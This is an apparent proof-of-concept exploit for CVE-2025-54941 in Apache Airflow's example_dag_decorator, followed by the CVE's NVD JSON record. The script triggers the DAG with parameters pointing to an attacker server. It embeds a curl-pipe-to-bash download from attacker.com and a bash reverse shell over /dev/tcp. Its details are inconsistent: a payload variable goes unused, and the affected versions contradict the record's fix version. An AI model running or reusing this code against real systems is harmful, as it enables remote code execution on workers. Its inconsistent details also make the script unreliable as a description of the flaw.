CVE-2025-54941

# CVE-2025-54941 PoC - Apache Airflow example_dag_decorator Exploitation # Target: Apache Airflow <= 3.0.5 import requests import json from urllib.parse import urlencode TARGET_URL = "http://target-airflow-server:8080" MALICIOUS_SERVER = "http://attacker-controlled-server:8888" DAG_ID = "example_dag_decorator" USERNAME = "attacker_user" PASSWORD = "user_password" def get_auth_token(): """Obtain Airflow authentication token""" response = requests.post( f"{TARGET_URL}/auth/login", data={"username": USERNAME, "password": PASSWORD} ) return response.cookies.get('session') def exploit(): """ Exploit the unvalidated parameter in example_dag_decorator to redirect execution to malicious server """ session = get_auth_token() # Malicious payload that will be served by attacker server malicious_payload = { "command": "curl http://attacker.com/shell.sh | bash", "target_server": MALICIOUS_SERVER } # Trigger DAG with malicious parameters trigger_data = { "conf": json.dumps({ "target_url": MALICIOUS_SERVER, "callback_endpoint": f"{MALICIOUS_SERVER}/callback" }) } response = requests.post( f"{TARGET_URL}/api/v1/dags/{DAG_ID}/dagRuns", cookies={"session": session}, json=trigger_data ) print(f"DAG triggered: {response.status_code}") return response.json() # Attacker-controlled server should serve malicious commands MALICIOUS_SERVER_CODE = ''' #!/bin/bash # This script will be executed on the Airflow worker # Reverse shell or arbitrary command execution bash -i >& /dev/tcp/attacker-ip/4444 0>&1 '''

{"cve": {"id": "CVE-2025-54941", "sourceIdentifier": "[email protected]", "published": "2025-10-30T10:15:35.530", "lastModified": "2025-11-04T22:16:29.720", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An example dag `example_dag_decorator` had non-validated parameter that allowed the UI user to redirect the example to a malicious server and execute code on worker. This however required that the example dags are enabled in production (not default) or the example dag code copied to build your own similar dag. If you used the `example_dag_decorator` please review it and apply the changes implemented in Airflow 3.0.5 accordingly."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "E2461B24-C975-4644-B9FF-27F61C54C1DE"}]}]}], "references": [{"url": "https://lists.apache.org/thread/c6q6nofc6xl5bms039ks9b34v0v36df1", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}